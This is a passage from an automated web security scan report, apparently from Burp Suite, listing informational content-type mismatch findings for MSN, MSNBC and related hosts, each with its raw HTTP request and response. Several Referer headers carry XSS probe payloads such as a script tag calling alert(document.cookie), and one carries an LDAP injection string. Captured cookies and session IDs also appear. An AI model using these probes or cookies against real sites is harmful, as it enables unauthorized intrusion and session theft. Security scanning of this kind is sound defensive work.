JvnDtIsjUb/zVcQlQjZuod1g4vn09yqJVquOxJLM1d0+7Ucr+fmPdNj9Qmd0A8zJYQMWCk5bA/+Hv8sMO3my6Srpq95F78/9aIYU6wc8ZA1JRLeAq8bt655WrxRBsXiMCu8mEpioRIggSwrMH0yM3CGvInd8RSqrom2/5K2+SqvrvUQpxCcoUHkoTZ0vMYAyclWFTi1u
...[SNIP]...

34.36. http://investing.money.redacted/mv/MarketStatus previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://investing.money.redacted
Path:	/mv/MarketStatus

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /mv/MarketStatus?callback=jsonp1296350843300 HTTP/1.1
Host: investing.money.redacted
Proxy-Connection: keep-alive
Referer: http://money.redacted/investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=r0s4x3z5mhs3dbzck3llxj4w; path=/; HttpOnly
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:27:26 GMT
Content-Length: 49

jsonp1296350843300(["U.S. markets closed",81152])

34.37. http://investing.money.redacted/mv/MarketStatus/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://investing.money.redacted
Path:	/mv/MarketStatus/

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /mv/MarketStatus/?callback=jsonp1296392471559 HTTP/1.1
Host: investing.money.redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:21 GMT
Content-Length: 49

jsonp1296392471559(["U.S. markets closed",39578])

34.38. http://investing.money.redacted/mv/RecentQuotes/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://investing.money.redacted
Path:	/mv/RecentQuotes/

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /mv/RecentQuotes/?callback=jsonp1296350843302 HTTP/1.1
Host: investing.money.redacted
Proxy-Connection: keep-alive
Referer: http://money.redacted/investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kqt2o2pqwn51vivfhae3doc5; path=/; HttpOnly
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:27:27 GMT
Content-Length: 24

jsonp1296350843302([""])

34.39. http://javadl-esd.sun.com/update/AU/map-2.0.2.4.xml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://javadl-esd.sun.com
Path:	/update/AU/map-2.0.2.4.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /update/AU/map-2.0.2.4.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: javadl-esd.sun.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 15
Date: Sun, 30 Jan 2011 15:49:18 GMT
Connection: close
Cache-Control: private

File not found.

34.40. http://lib.newsvine.com/chrome/photoblog/images/footer.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://lib.newsvine.com
Path:	/chrome/photoblog/images/footer.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /chrome/photoblog/images/footer.jpg HTTP/1.1
Host: lib.newsvine.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:19:40 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 17 May 2010 19:43:06 GMT
ETag: "a38282-13800-486cf6f082680"
Accept-Ranges: bytes
Content-Length: 79872
Content-Type: image/jpeg

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Macintosh.2010:05:13 18:12:36.......
...[SNIP]...

34.41. http://lib.newsvine.com/chrome/thelastword/images/promo_videoplayer.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://lib.newsvine.com
Path:	/chrome/thelastword/images/promo_videoplayer.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /chrome/thelastword/images/promo_videoplayer.gif HTTP/1.1
Host: lib.newsvine.com
Proxy-Connection: keep-alive
Referer: http://thelastword.msnbc.redacted/?1406b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2b8d8f3d529=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 12:47:33 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Thu, 23 Sep 2010 23:55:55 GMT
ETag: "10cc54b-5bc9-490f600b418c0"
Accept-Ranges: bytes
Content-Length: 23497
Content-Type: image/gif

......JFIF.....H.H.... .Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Macintosh.2010:09:21 11:36:13.......
...[SNIP]...

34.42. http://local.redacted/ten-day.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://local.redacted
Path:	/ten-day.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /ten-day.aspx?q=New York-NY&zip=10038 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Sat, 29 Jan 2011 23:47:51 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

34.43. http://local.redacted/weather.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://local.redacted
Path:	/weather.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /weather.aspx?q=New York-NY&zip=10038 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Sat, 29 Jan 2011 23:47:41 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

34.44. http://redacted/inc/Views/Shared/Core/Content/js/utility.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://moneycentral.msn.com
Path:	/inc/Views/Shared/Core/Content/js/utility.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /inc/Views/Shared/Core/Content/js/utility.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:53:16 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

34.45. http://redacted/investor/StockRating/srsmain.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://moneycentral.msn.com
Path:	/investor/StockRating/srsmain.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:07 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

34.46. http://redacted/investor/home.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://moneycentral.msn.com
Path:	/investor/home.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 16:51:21 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

34.47. http://redacted/investor/market/earncalendar/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://moneycentral.msn.com
Path:	/investor/market/earncalendar/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:03:37 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

34.48. http://redacted/investor/market/treasuries.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://moneycentral.msn.com
Path:	/investor/market/treasuries.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /investor/market/treasuries.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:02:47 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

34.49. http://redacted/investor/partsub/funds/etfperformancetracker.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://moneycentral.msn.com
Path:	/investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /investor/partsub/funds/etfperformancetracker.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:12:39 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

34.50. http://msnbcmedia.redacted/j/ap/gays previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://msnbcmedia.redacted
Path:	/j/ap/gays

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /j/ap/gays HTTP/1.1
Host: msnbcmedia.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:41 GMT
Connection: close

<h1>404 Image Not Found</h1>

34.51. http://msnbcmedia.redacted/j/ap/missing previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://msnbcmedia.redacted
Path:	/j/ap/missing

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /j/ap/missing HTTP/1.1
Host: msnbcmedia.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:34 GMT
Connection: close

<h1>404 Image Not Found</h1>

34.52. http://msnbcmedia.redacted/j/ap/nannies previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://msnbcmedia.redacted
Path:	/j/ap/nannies

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /j/ap/nannies HTTP/1.1
Host: msnbcmedia.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Date: Sun, 30 Jan 2011 02:16:30 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Connection: close

<h1>404 Image Not Found</h1>

34.53. http://msnbcmedia.redacted/j/ap/super previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://msnbcmedia.redacted
Path:	/j/ap/super

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /j/ap/super HTTP/1.1
Host: msnbcmedia.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

34.54. http://msnbcmedia.redacted/j/ap/switzerland previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://msnbcmedia.redacted
Path:	/j/ap/switzerland

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /j/ap/switzerland HTTP/1.1
Host: msnbcmedia.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:36 GMT
Connection: close

<h1>404 Image Not Found</h1>

34.55. http://msnbcmedia.redacted/j/ap/tampa previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://msnbcmedia.redacted
Path:	/j/ap/tampa

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /j/ap/tampa HTTP/1.1
Host: msnbcmedia.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:37 GMT
Connection: close

<h1>404 Image Not Found</h1>

34.56. http://offers.lendingtree.com/splitter/splitter.ashx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://offers.lendingtree.com
Path:	/splitter/splitter.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /splitter/splitter.ashx HTTP/1.1
Host: offers.lendingtree.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 29 Jan 2011 23:50:25 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Nickname: Scooby Doo
X-Powered-By: ASP.NET
Content-Length: 48
Connection: Close

The given key was not present in the dictionary.

34.57. http://oneightyla.vo.llnwd.net/o37/live/sony/2010_11_04_BLOGGIE/video/TubeFailWin-160x90.flv previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://oneightyla.vo.llnwd.net
Path:	/o37/live/sony/2010_11_04_BLOGGIE/video/TubeFailWin-160x90.flv

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

34.58. http://openchannel.msnbc.redacted/_vine/printer previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://openchannel.msnbc.redacted
Path:	/_vine/printer

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=openchannel&path=/ HTTP/1.1
Host: openchannel.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://openchannel.msnbc.redacted/?52854%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae378974d45=1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SSLB=0; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296392120662

Response

34.59. http://photoblog.msnbc.redacted/_vine/printer previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://photoblog.msnbc.redacted
Path:	/_vine/printer

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=photoblog&path=/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun HTTP/1.1
Host: photoblog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:19:40 GMT
Connection: close
Content-Length: 528

